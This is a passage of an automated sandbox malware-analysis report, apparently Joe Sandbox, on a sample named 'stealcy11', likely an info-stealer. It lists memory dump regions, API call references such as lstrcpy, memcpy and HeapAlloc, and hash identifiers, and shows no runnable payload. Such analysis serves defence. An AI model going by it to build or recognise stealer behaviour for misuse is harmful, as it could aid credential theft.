                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2884196479-1517697755
                                  • Opcode ID: 9287a0546124a9652bddb680b09e8223dfe589f57e5793cb1edc305591813d3c
                                  • Instruction ID: a544a8605d085cf1d3aac22f6b1593ce8f1687299cd43b8a1ef862a9888420b1
                                  • Opcode Fuzzy Hash: 9287a0546124a9652bddb680b09e8223dfe589f57e5793cb1edc305591813d3c
                                  • Instruction Fuzzy Hash: EA3154B5E00519DFCB08DF59C8916ADBBB6FB89310F148269E919EB385DB30A901CBD1
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E8767
                                    • Part of subcall function 0090A1A3: std::exception::exception.LIBCMT ref: 0090A1B8
                                    • Part of subcall function 0090A1A3: __CxxThrowException@8.LIBCMT ref: 0090A1CD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2884196479-1517697755
                                  • Opcode ID: 3be2ee9f2c9566c0d1137303d8e3f702098eabf53ba854240679ef9a97210af7
                                  • Instruction ID: e342961e85ecfe41a305b9662c9d568b9c9fe36350c59de23a8e5cc7942d9f1f
                                  • Opcode Fuzzy Hash: 3be2ee9f2c9566c0d1137303d8e3f702098eabf53ba854240679ef9a97210af7
                                  • Instruction Fuzzy Hash: 4EF09A27B140258F8354A43E8D8409EA946A6E639037AC761E95EEF288EC30EC8291D0
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E880C
                                  • memcpy.MSVCRT(?,?,00000000,00000000,008E77D7), ref: 008E8852
                                    • Part of subcall function 008E89B0: std::_Xinvalid_argument.LIBCPMT ref: 008E89C6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memcpy
                                  • String ID: string too long
                                  • API String ID: 2304785028-2556327735
                                  • Opcode ID: 64c947340368bd299a7307a451a5d0ef1eef5c3e8bba2ab1fc9d65e632fdac92
                                  • Instruction ID: 5f94df38691920d32fe45c4fd5d98bb0656a3697a581e8d368cf59256fe9a161
                                  • Opcode Fuzzy Hash: 64c947340368bd299a7307a451a5d0ef1eef5c3e8bba2ab1fc9d65e632fdac92
                                  • Instruction Fuzzy Hash: 7F21C1207006A0CFDB358A6E8880A2EA7E5FB87700B640929F89AC7781DFA1DC408795
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E8AA5
                                    • Part of subcall function 0090A1A3: std::exception::exception.LIBCMT ref: 0090A1B8
                                    • Part of subcall function 0090A1A3: __CxxThrowException@8.LIBCMT ref: 0090A1CD
                                  • memcpy.MSVCRT(?,?,?), ref: 008E8AEF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
                                  • String ID: string too long
                                  • API String ID: 2475949303-2556327735
                                  • Opcode ID: 4efbe0a59a551f516f02a6480c39d35b493fd8c8f559b1aed14f3b7c76df3dd5
                                  • Instruction ID: 6deb5b06841c996e82fbdfb60028ea2dc4aa6e61ee93fd53507a203f45a01541
                                  • Opcode Fuzzy Hash: 4efbe0a59a551f516f02a6480c39d35b493fd8c8f559b1aed14f3b7c76df3dd5
                                  • Instruction Fuzzy Hash: 4C212972B046589FE720CE6EDC4066EB7E6FBD6320F148A6AEC59C3380DF7099458791
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 008E8BBF
                                    • Part of subcall function 0090A1F0: std::exception::exception.LIBCMT ref: 0090A205
                                    • Part of subcall function 0090A1F0: __CxxThrowException@8.LIBCMT ref: 0090A21A
                                  • memmove.MSVCRT(?,?,?,?,?,008E89E2,00000000,?,?,008E8800,?,00000000,008E77D7), ref: 008E8BF5
                                  Strings
                                  • invalid string position, xrefs: 008E8BBA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
                                  • String ID: invalid string position
                                  • API String ID: 655285616-1799206989
                                  • Opcode ID: f294f66b89a01fa97e651694c6cb98d5129823f84cf0e401f8a591c8a0c74af3
                                  • Instruction ID: c08970f72463a688a34aaaa752934ab23e70fc2875b47d66d2a28bc00e71e40d
                                  • Opcode Fuzzy Hash: f294f66b89a01fa97e651694c6cb98d5129823f84cf0e401f8a591c8a0c74af3
                                  • Instruction Fuzzy Hash: 7B018470304785DFD3258A6CEC9461EB2A6EBC6718B294918D099C7789DB70DC818790
                                  APIs
                                    • Part of subcall function 008E1510: lstrcpy.KERNEL32(00000000), ref: 008E152D
                                    • Part of subcall function 008E1510: lstrcpy.KERNEL32(00000000,?), ref: 008E154F
                                    • Part of subcall function 008E1510: lstrcpy.KERNEL32(00000000,?), ref: 008E1571
                                    • Part of subcall function 008E1510: lstrcpy.KERNEL32(00000000,?), ref: 008E1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E1437
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E1459
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E147B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E14DF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 1cf5f43708d938ff76eadeedebc2c99c057c4898bcb19c036d9d2c93d049e78f
                                  • Instruction ID: f3eff46f005f2d0ee113b29f2bcf3f2432250295023234c05b4076f1e448ec45
                                  • Opcode Fuzzy Hash: 1cf5f43708d938ff76eadeedebc2c99c057c4898bcb19c036d9d2c93d049e78f
                                  • Instruction Fuzzy Hash: F131E8B4A01B82AFCB28DF3AC558956BBE5FF49704700492DA856C3B50DB70F850CB80
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 00901581
                                  • lstrcpy.KERNEL32(00000000,?), ref: 009015B9
                                  • lstrcpy.KERNEL32(00000000,?), ref: 009015F1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00901629
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 1107cdf193ed9d13202bb45de3d3507e833618c820c6b5cb588c6a7c726d98d6
                                  • Instruction ID: 7e39fbc78407c0d11a948dba4ad1388046fa401fd27496cd1e71f308d66e6967
                                  • Opcode Fuzzy Hash: 1107cdf193ed9d13202bb45de3d3507e833618c820c6b5cb588c6a7c726d98d6
                                  • Instruction Fuzzy Hash: 2B21D7B4601B429FD724DF2AC858A17B7F9FF49700B044A2DA886CBB81DB70E851CB91
                                  APIs
                                  • memcpy.MSVCRT(?,?,00000040), ref: 008E6E40
                                  • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 008E6E7C
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 008E6EB4
                                  • HeapAlloc.KERNEL32(00000000), ref: 008E6EBB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heapmemcpy$AllocProcess
                                  • String ID:
                                  • API String ID: 1643994569-0
                                  • Opcode ID: 84cdf451b47ba9daa7e2eb6f2155cf7befd66f9ea58d2af040d245b22f8d9d59
                                  • Instruction ID: bd354ec3ce237cefb85ad15bde008e50a9bddee7cc72ae370ef9499197a985e6
                                  • Opcode Fuzzy Hash: 84cdf451b47ba9daa7e2eb6f2155cf7befd66f9ea58d2af040d245b22f8d9d59
                                  • Instruction Fuzzy Hash: D9219DB06006429BEB208B26DC84BBB73E9FB56744F444468FA46CB684FB78E951CB51
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 008E152D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E154F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E1571
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E1593
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 2e3476918b2859d40cd95c878039dc0efcf5d544674ffa065a508f29db8d1770
                                  • Instruction ID: 6ffd3353cf0f5cff34eb7e7a1b344c080d961430545b9939dfa88a175abff52a
                                  • Opcode Fuzzy Hash: 2e3476918b2859d40cd95c878039dc0efcf5d544674ffa065a508f29db8d1770
                                  • Instruction Fuzzy Hash: 3211ECB4A01B82ABDB249F7AD45C927B7F8FF8A711304452DA857C7B50EB30E950CB90